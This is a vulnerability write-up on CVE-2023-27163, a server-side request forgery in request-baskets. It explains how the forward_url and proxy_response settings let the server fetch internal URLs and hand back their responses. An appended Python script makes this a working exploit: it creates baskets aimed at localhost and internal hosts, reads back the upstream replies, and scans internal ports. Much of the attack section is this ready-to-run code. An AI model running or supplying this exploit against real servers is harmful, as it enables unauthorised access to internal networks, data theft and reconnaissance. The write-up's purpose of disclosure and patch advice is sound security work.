CVE-2023-27163
Request-basket SSRF
Last updated
Request Baskets is a web service to collect arbitrary HTTP requests and inspect them via RESTful API or simple web UI.
It is strongly inspired by ideas and application design of the RequestHub project and reproduces functionality offered by RequestBin service.
CVE-2023-27163 - request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
First, I download and run the vulnerable version.
The main page of Request Baskets:
The following APIs are vulnerable to SSRF:
/api/baskets/{name}
/baskets/{name}
After creating a basket, open its administration page.
Clicking "Settings" opens a configuration menu with further options.
"Forward URL" is the vulnerable option: the server itself fetches whatever URL is set there, which is what makes the SSRF possible.
Example payload for the POST request to /api/baskets/{name}:
proxy_response: when a forward URL is configured, this additional setting makes the server process the forwarded request and return the upstream response to the client. The exploit must set this option to true; otherwise the request is still forwarded, but the response never comes back to you.
As an illustrative example, consider reaching an internal web admin panel on port 80: set forward_url to http://127.0.0.1:80/ and proxy_response to true.
Then visit your basket URL, e.g. "http://127.0.0.1:55555/new" (55555 is the default request-baskets port and "new" is the basket name); the admin panel's response is returned to you.
Information Disclosure and Exfiltration
One critical consequence is information disclosure and exfiltration. It was initially found that unauthenticated requests for images could leak every image stored on the server. The issue is not limited to images, though: any resource that can be fetched with an HTTP request from the web server's local network can be retrieved remotely this way.
Unauthenticated Access to Internal Network HTTP Servers
The SSRF can be used to reach, without authentication, any HTTP server on the same network as the request-baskets host: for example an Nginx instance that is only exposed internally, an internal RESTful API (such as a NoSQL or GraphQL database endpoint), or any other HTTP service. The exposure is not limited to services on the local machine; every machine reachable from the server on the internal network is in scope.
Port and IP Scanning and Enumeration
The vulnerability also allows port scanning and host enumeration. By pointing forward_url at each host and port in turn, an attacker can probe internal and external HTTP servers on demand and enumerate the machines on the internal network that have HTTP ports open, which helps identify further entry points.
These issues pose a serious risk and should be fixed promptly: upgrade request-baskets past v1.2.1, and restrict which destinations a forward URL may point to (or disable forwarding) where the service must stay exposed.
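The exploit steps above (create a basket with forward_url and proxy_response set, then request the basket URL) and the port enumeration described in this section, as an added example in Python. This is not code from the original writeup or from the request-baskets project. It assumes request-baskets is listening on 127.0.0.1:55555 (its default port) with the API paths named on this page; the basket fields forward_url and proxy_response behave as described above, and the other fields sent (insecure_tls, expand_path, capacity) are assumed to be accepted with the harmless values shown. Nothing contacts a server unless main() is run; the helpers that build payloads and URLs work offline.

```python
"""Drive the CVE-2023-27163 SSRF in request-baskets via basket forwarding.

Added example, not the original page's or the project's own code.
Assumptions are marked in comments below.
"""
import json
import urllib.error
import urllib.request

BASE = "http://127.0.0.1:55555"  # assumption: default request-baskets port


def build_payload(forward_url: str) -> dict:
    """Basket settings that turn the basket into a proxy for forward_url."""
    return {
        "forward_url": forward_url,  # the server fetches this URL on our behalf
        "proxy_response": True,      # return the upstream response to us (required)
        "insecure_tls": False,       # assumption: other documented basket fields
        "expand_path": True,         # append the path we request under the basket
        "capacity": 250,
    }


def api_url(name: str, base: str = BASE) -> str:
    """Vulnerable endpoint: POST /api/baskets/{name}."""
    return f"{base}/api/baskets/{name}"


def basket_url(name: str, base: str = BASE) -> str:
    """Where the proxied response is collected: GET /{name}."""
    return f"{base}/{name}"


def create_basket(name: str, forward_url: str, base: str = BASE):
    """Create (or fail on an existing) basket; returns (status, token)."""
    body = json.dumps(build_payload(forward_url)).encode()
    req = urllib.request.Request(
        api_url(name, base), data=body, method="POST",
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status, json.load(resp).get("token")


def fetch_via_basket(name: str, path: str = "/", base: str = BASE):
    """Hit the basket; with proxy_response=true the upstream reply comes back."""
    req = urllib.request.Request(basket_url(name, base) + path)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:  # non-2xx is still a useful signal
        return err.code, err.read()


def scan_plan(host: str, ports, prefix: str = "scan"):
    """One basket per port: list of (basket name, forward_url)."""
    return [(f"{prefix}{p}", f"http://{host}:{p}/") for p in ports]


def scan(host: str, ports, base: str = BASE) -> dict:
    """Probe each port through a fresh basket and record (status, body size).

    Assumption: a closed port yields a different status/body than a live
    HTTP service, so the caller compares entries against a known-closed
    baseline rather than trusting a single fixed status code.
    """
    results = {}
    for name, target in scan_plan(host, ports):
        create_basket(name, target, base)
        status, body = fetch_via_basket(name, "/", base)
        results[int(name[len("scan"):])] = (status, len(body))
    return results


def main():
    # Single SSRF: internal admin panel on port 80, read back via basket "new".
    create_basket("new", "http://127.0.0.1:80/")
    status, body = fetch_via_basket("new", "/")
    print(status, body[:200])
    # Enumeration: which HTTP ports answer on an internal host (assumed IP).
    print(scan("10.0.0.5", [80, 8080, 8443]))


if __name__ == "__main__":
    main()
```

Because baskets are cheap to create, one basket per (host, port) keeps each probe's forward_url fixed and the results easy to attribute; on a patched server the same POST is rejected or the forward target is restricted, which is the check a defender should run.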